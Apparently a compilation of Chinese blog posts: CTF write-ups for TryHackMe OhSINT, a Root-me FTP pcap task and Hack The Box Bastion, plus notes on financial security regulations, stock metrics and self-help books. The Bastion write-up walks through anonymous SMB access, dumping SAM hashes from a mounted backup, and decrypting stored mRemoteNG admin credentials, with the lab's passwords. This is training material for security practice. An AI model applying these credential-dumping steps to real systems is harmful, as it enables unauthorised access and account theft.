[Tryhackme] OhSINT write-up 解法

最近想嘗試不同的滲透測試或CTF練習平台
Hack the box / Root me / Tryhackme
先附上連結:
https://tryhackme.com/room/ohsint

首先下載一張windowsXP.jpg

拆解圖片資訊首先會想到ExifTools這個工具

由於半夜了目前還不想使用Kali , 我丟到了: 

http://metapicz.com/

去看看圖片資訊

發現了Copyright: OWoodflint

Google - OWoodflint

我們找到了一隻貓! 還有一些information 

因為answer format : XXX

合理的猜是cat

果然!

接著找到上面的資訊 BSSID number 去

https://find-wifi.mylnikov.org

我們在GOOGLE上搜尋時候發現頁面有
1.GitHub
2.Blog
我們先看Github

我們找到GitHub 上的資訊

https://github.com/OWoodfl1nt/people_finder

Answer:

回到之前的GOOGLE頁面我們發現一個BLOG

上面寫 I 'm in New York

最後一關則是密碼

因為沒什麼東西登入的東西

只能從原始碼找

好像找到一個很像Flag的東西

[Root me] FTP authentication Write-up 解法

最近滲透測試技能的提升
除了Hack the box來打靶機以外還多去找了root me 、tryhackme來練習
先送上這題的Link
https://www.root-me.org/en/Challenges/Network/FTP-authentication

Statement

An authenticated file exchange achieved through FTP. Recover the password used by the user.

找出FTP封包中的帳號與密碼

首先看一下FTP這個協定的RFC內容(RFC很重要)

下載頁面提供的檔案 用Wireshark 開起來後我先做Protocol 的排序

發現有跟RFC上有關的格式..

一看就看見是明文傳輸都Show在後面的info欄位

打開看一下:

丟回去輸入找到的密碼得分!

[資訊安全]金融業資訊安全技術法規要求簡介

從事資訊安全技術評估幾乎都接觸到金融業
也常常去做查核
那就順手來整理一下常見的資安技術法規囉

首先必須談到最基本的:

金融機構辦理電腦系統資訊安全評估辦法:

為確保金融機構提供電腦系統具有一致性基本系統安全防護能力並遵循中華民國銀行商業同業公會全國聯合會制訂之「金融機構資訊系統安全基準」及「金融機構辦理電子銀行業務安全控管作業基準」，擬透過各項資訊安全評估作業，發現資安威脅與弱點，藉以實施技術面與管理面相關控制措施，以改善並提升網路與資訊系統安全防護能力，訂定本辦法。

該評估辦法是在評估資訊技術檢測的項目，但金管會還會不斷更新與要求做法規的稽核

那相關的技術法令法規包含在下表:

合規檢視

金融機構資訊系統安全基準
金融機構辦理電子銀行業務安全控管作業基準
金融機構提供行動裝置應用程式作業規範
金融機構提供自動櫃員機系統安全作業規範
金融機構運用新興科技作業規範
金融機構使用物聯網設備安全控管規範
主管機關及本會相關函文之要求
SWIFT公布之Customer Security Programme 




首先，最難查是金融機構辦理電子銀行業務安全控管作業基準

要求的準則太多了，每次去查核都必須花非常多時間做訪談與佐證收集。



第一項系統安全基準已經歷史悠久，而物聯網設備安全控管規範則是蠻新的法規，但寫的其實不是非常清楚

有模糊空間，範圍和查核方式每個人解讀都有可能不同



至於SWIFT則是非常重要的全球要求的法規，銀行都必須做查核確保核心SWIFT的安全控管都有做到。

金融股票九大指標一次搞懂-殖利率/EPS/ROA與ROE/本益比PER/ PBR 股價淨值比

參考了柴鼠兄弟的影片
整理出了一些名詞心得:

柴鼠兄弟頻道:
https://www.youtube.com/channel/UC45i13dEfEVac2IEJT_Nr5Q


看完了基本的解說後整理出心得如下:

金融九大指標

金字塔四面股票文法 (基本/籌碼/技術/消息)
1.基本面:
對公司股票進行估值，並預測未來價格趨勢
預測公司未來表現。
如本益比、ROE、ROA、資本額、董事長、營收、殖利率等

2.籌碼面:(勢力分布 股票狀況等)
如分布狀態:董監持股/三大法人/融資融券/資卷比
流動狀態:主力進出/持股轉讓等

3.技術面:(股價 成交量 籌碼等透過線圖表示)
如元素:分時走勢/K線/均線/成交量
指標:買賣超/KD/MACD/RSI/DMI/當沖量
型態分析:頭部/底部/趨勢線/多頭or空頭排列等
理論學家:道氏理論、波浪理論、葛蘭碧八大法則

4.消息面:無規則
------------------------------
基本面指標(單字):做什麼? 賺什麼?

• 殖利率

殖利率=以這個價格買進每年大約可以回收幾%的股利
股利/股價(成本) = 殖利率
若能 > 5% 最好
如:5/100=殖利率5%  但 5/110=殖利率4.5%
殖利率與股價變動的 2 個關係：
1. 買進的股價越低，殖利率就越高
2. 買進的股價越高，殖利率就越低

通常是以現金股利除以除息前一天的收盤價來計算
每年發放的股利是事先預定好的，但股價會變

• 資本額(股本)

可以換算成一間公司有多少股數，股數越多股本越大
流通性也高比較好賣。大鼓本公司股價也不容易被炒作

資本額=股數X股票面額(10元 票面價)
總市值: 市價(股價 成交價)X市值股數
市值隨著每天股價變化來變動

漲價10%=漲停  跌了10%=跌停

• EPS(每股稅後盈餘)

資本額有大有小 要如何知道大公司還是小公司誰賺錢比較厲害?

稅後淨利(繳完稅金之後的淨利)/股數(資本額/10)=平均每一股完稅之後還賺多少錢(EPS 每股的獲利)
   
白話文:賺的錢除以股票數量
簡單說可以當成把薪水全部換算成時薪來比較
評鑑 代表EPS和股價是呈現正相關的。

所以EPS意思是:每股稅後盈餘或是每股純益
四季財報公布的EPS加起來可以得到全年EPS

每年董事會會依照EPS討論拿多少出來發股利
=盈餘分配率
盈餘分配率高想要存股息比較好

所以除權息領的股利=去年一整年賺的錢

假設遇到 配股息但淨利沒有增加:
EPS=稅後淨利/股數  ，所以分母變大EPS小
就是股本膨脹稀釋獲利

EPS無法完全反映一間公司的 "獲利能力"
但大體上可能決定一支股票的股價

評價EPS高低時:
比較不同公司EPS高低沒有意義，要同時考慮股價和本益比才有意義

理論上EPS賺越多的公司，股價也會相對越高，
因此在評估時我們不會直接看EPS高低，
而是用本益比(PE Ratio)做判斷。


評估企業獲利的重要指標-ROA與ROE

• ROA介紹

EPS:簡單說可以當成把薪水全部換算成時薪來比較
但無法呈現工作付出的實際樣貌，無法知道效率與投入資源資產!!

資產:包含公司的資金、廠房、設備、原物料，可以為公司帶來經濟利益的資源都算

稅後淨利(繳完稅金之後的淨利)/資產(經濟資源)=資產報酬率(ROA)  Return on asset
代表公司對整體資產的運用能力

稅後淨利200萬/公司資產1000萬=ROA 20%

• ROE介紹

公司資產扣掉借貸後才是"淨值" 也是 會計科目的"股東權益"
=公司真正自己有的錢=每個股東可以分配到的權益

稅後淨利(繳完稅金之後的淨利)/淨值(股東權益)=股東權益報酬率(ROE) Return on Equity
ROE=評估一間公司透過"股東資金"獲利的能力

舉例:
公司資產1000萬,500萬借貸
去年相同淨利200萬  , 200/500=ROE 40%!
利用股東的500萬創造出200萬報酬
(相對賠錢也是40%)

公司資產1000萬,0借貸
去年相同淨利200萬 , 200/1000=ROE 20%`
利用股東的1000萬創造出200萬報酬

ROE計算注意:淨利/淨值
ROE很高情況代表:
1.很會賺錢(分子很大)
2.很會借錢來賺錢(分母很小) ->融資槓桿


判斷ROA ROE高低標準?
ROE(股東權益報酬率)高於20  但台灣大概>10就好  ,3-5%及格
ROA(資產報酬率)高於10
每年都需要高


股票目前價格合不合理? 貴還是便宜? 要算什麼?

• 本益比(PE或PER) = 成本和獲益的比例 = 賺多少

股價淨值比(PBR) = 值多少
殖利率(Yield) = 配多少

三大基礎價格評估指標

• 本益比PER

股價成"本"與每一股純"益"之間的"比"例
股價(購入成本)/EPS(年度每股純益) = 本益比(PER)

舉例:
股價:100
EPS: 4
PER: 25倍
代表目前股價是去年每股(稅後)盈餘的25倍(2500%)

合理倍數?
1.與過往PER倍數相比，如低於過去平均也許有上漲空間
2.與同產業比平均本益比，若自己PER太高會遇到上漲壓力

PER本益比:是快速評估公司價格是否合理的指標
與同產業或自己比較可以知道現在股價是偏高還是偏低

注意:金融股也有分壽險強 證卷多 或者官股等獲利來源不同
也會影響到本益比表現

成長型的股票EPS可能會較高，本益比也會較高，有較大的空間

• PBR 股價淨值比  值多少??

每股價格(購入成本)/每股淨值(淨值/股數,淨值需扣掉借貸)
=股價淨值比PBR  (每一股有多少淨值)

用來評估公司現在的股價是偏離現在淨值的多少
例如:
公司資產1000萬,500萬借貸,淨值為500萬
目前有10萬股(資本額100萬)
->每股淨值500萬/10萬股=50塊

現在股價為40塊
每股價格(40)/每股淨值(50)=0.8 PBR
每股價格(60)/每股淨值(50)=1.2 PBR

PBR以1為基準!

**注意
PBR沒有獲利因素在內，低於價格也不見得會獲利!

• 殖利率(Yield)   配多少?

殖利率=以這個價格買進每年大約可以回收幾%的股利

股利/股價(成本) = 殖利率
若能 > 5% 最好
如:5/100=殖利率5%  但 5/110=殖利率4.5%
殖利率與股價變動的 2 個關係：
1. 買進的股價越低，殖利率就越高
2. 買進的股價越高，殖利率就越低

通常是以現金股利除以除息前一天的收盤價來計算
每年發放的股利是事先預定好的，但股價會變


--------------------------------------
基本面九大指標
做什麼:股本、市值、產業
賺什麼:EPS、ROE(股東權益報酬率)、ROA(資產報酬率)
算什麼:PER(本益比)，PBR(股價淨值比)、殖利率

[Hack The Box] Bastion Write-up 解法

Hack The Box - Bastion Write-up

首先使用NMAP掃描   

nmap -sV -T4 -O -F --version-light 10.10.10.134

-F 加快掃描

-sV需要各種服務

smbmap -L 10.10.10.134

smbclient    //連線SMB伺服器的工具

指令格式：smbclient –L [SMB伺服器IP] [參數]

-p：指定連線port number

-U 使用者名稱：指定使用者名稱

-L List all drives on the specified host 

帳號可使用 Guest

我們發現 使用Guest  密碼空白就可以access

Windows 這邊指令我很不熟 所以看了很多教學

參考如下:

使用cd時候最後要列出Backup 2019-02-22 12351內的檔案

最後指令資料夾路徑要加入” ”  (括號) 

我在這邊卡的時間蠻長的

smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"

發現是vhd , 於Linux下使用mount 將檔案下載下來

因為Mount 不常使用 所以不熟 也看了很多資料 如下:

https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25

指令:

mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC  ~/Desktop/mount -o user=anonymous

會顯示:

Password for anonymous@//10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC: 

接著直接按Enter

把SAM和SYSTE複製出來

1.     掛載VHD

但檔案真的很肥 去回去找了LINUX上方式

Mounting the Backup Image, Dumping Credentials, User Flag

These vhd images are the system backup files. As the note said, trying to download them will take a very long time and probably won’t finish because of their big size, so instead we will mount them, I wanted to look at 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd first. This was helpful.

後來發現還是Mount好  不用整個載下來((Windows下我解不出來))
所以上面浪費了一點時間XD 回到Kali

先mount上檔案

root@kali:~# mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC  /mnt/L4mpje-PC/ -o user=anonymous

Password for anonymous@//10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC: 

root@kali:~# qemu-nbd -r -c /dev/nbd0 "/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"

root@kali:~# mount -r /dev/nbd0p1 /mnt/vhd

root@kali:~# cd /mnt/vhd

接下來要找到SAM和SYSTEM的檔案放置處

在System32/Config 下

使用指令 samdump2 SYSTEM SAM

Windows格式是Ntlm  去反解

26112010952d963c8dc4217daec986d9

接下來連線回去主機登入

Kali內用ssh連線                                                                          

L4mpje@10.10.10.134    密碼是解出來的bureaulampje

在桌面 把檔案用type找出來

9bXXXXXXXXXXXXXXXXXXcd

我試著輸入root

沒有結果 

回hack the box 輸入解答

得到分數

----------------------------------------------------

尋找Root:

C:\Users\L4mpje\AppData\Roaming

這邊可以知道Windows下有安裝甚麼東西

發現了一個可以遠端的程式 mRemoteNG

(mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager. mRemoteNG adds bug fixes and new features to mRemote.
It allows you to view all of your remote connections in a simple yet powerful tabbed interface. -mremoteng.org

)

找到該資料夾下的confCons.xml

將檔案下載下來 最後一個.是當前目錄

scp l4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .

我用nano打開confCons.xml

找到Admin 後面的password

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

丟base 64 decode解不開

上網查一下 他有先處理過才base64

使用這套工具來解

https://github.com/kmahyyg/mremoteng-decrypt/blob/master/mremoteng_decrypt.py

python3 NG.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

密碼為 :

thXLHM96BeKL0ER2

接著SSH登入

Administrator@10.10.10.134

thXLHM96BeKL0ER2

解出來為

95XXXXXXXXXXXXXXXXXXXXXc8

拋回去解Own Root

[讀書心得]關於人生的7項財務思考：7堂一定要懂的理財投資×人生規劃必修課

有緣讀到這本還不錯的書
雖然說大家對財務的價值觀不同  但不同想法我覺得都可以參考看看

理財:

1. 學到東西的訣竅，就是一下子不要學很多-John Locke
2. 傑出人士與平庸之輩最根本的差別 不在於天賦也不在於機遇 而是有無人生目標
3. 畢業後前五年很關鍵
4. 節儉但千萬不可吝嗇
5. 生涯有規劃  職涯也要有  要從生活中找到樂趣
6. 學習跟投資一樣 重要的是現在開始且持續不斷
7. 凡是有例外   調整心態 我愛挑戰

投資:

1. 風險來自於你不知道自己在做些什麼 
2. 股市向上帝一樣會幫助自助的人，但和上帝不同的是 他絕對不會寬恕那些不知道自己在做什麼的人

買股:

有限分散，如:

• 成長型70%
• 價值型20%
• 短期10%

1. 至多5-10檔股票 太多無法深入了解
2. 股價總是你發現以前 就已經反映了
3. 停損與停利需要設定好
4. 遵守紀律 培養心理素質
5. 你的投資方法一定要有系統 否則連你自己置身於何處都會一頭霧水
6. 不熟悉的個股不要碰
7. 天曉得利率 經濟景氣或股市未來會怎樣 不如把雞令放在上市公司 仔細研究

股價下爹該不該攤平?

1. 大股東持股高低?
2. 籌碼是否乾淨
3. 是市場還是單一事件
4. 產業趨勢

買股與生活

1. 基礎要懂 要讀書不能偷懶
2. 獲利和風險要共同考量
3. 投資理財是終身學習 不要期待一夕致富
4. 手上留錢是活路
5. 價格是你所付出的 價值是你所得到的
6. 真正的成功是來自於各項的平衡

[讀書心得]目標管理的力量:自我與人生管理

自我管理

1. 及早檢視、修正方向
2. 意志力有限 同一個帳戶目標要確實不要多
3. 找出行動能量且不要對自己留情  要知道有多渴望達成
4. 持續追蹤

意志力:

1. 增加改變心意的難度 (例如鬧鐘放很遠)
2. 增加及時滿足的痛苦
3. 為每一個決定設定期限
4. 想像未來的自己

持續力

1. 確認價值觀 少做虛度光陰之事情
2. 每天提升自己0.1%  達成複利
3. 我有多渴望目標

• 改善 是平凡人變天才的想法

人生管理

1. 排出優先序 集中3-4項重點
2. 力求簡化 目標容易了解
3. 定期檢討追蹤 沒當一回事也沒用

[讀書心得]目標管理的力量:目標管理

要點

1. 制定明確目標
2. 拆解作業流程
3. 排定優先序
4. 委派分配任務
5. 精準掌握時程
6. 找出風險因子
7. 總結檢討與改善

**方向錯了 也是徒勞

**找到非做不可的理由

Step:1

1. 在乎這個目標，不是數字而是意義(Heartfelt)
2. 想像成功的畫面  放在可提醒自己的地方(Animated)
3. 製造出急迫感 把事情拆解(require)
4. 設定挑戰季高難度的目標
5. 定期檢視修正目標高低

Step:2

1. WBS拆解工作項目(3-6階層)
2. MEMC原則 彼此獨立 互無遺漏
3. 系統性列舉

Step:3

排定優先序

如依照:

1. 工作量
2. 難易度
3. 複雜度
4. 重要性
5. 緊急性

一定要問自己:

1. 為何要做
2. 何時完成(明確)
3. 長期下來要做最多的
4. 考量急迫與重要性
5. 突發急件未必一定=優先

Step:4

委派分配工作

1. 相信他人可以
2. 委派時候考慮:

• 確定目標與期許
• 時程與進度
• 設定檢核日期
• 盡可能的話 委派全部
• 掌握大進度就好 無須繁瑣

Step:5

精準掌握時程

決定幾點幾分開始做 按部就班完成

Step:6

排定兩天備案，風險管控

Step:7

運動PDCA改善循環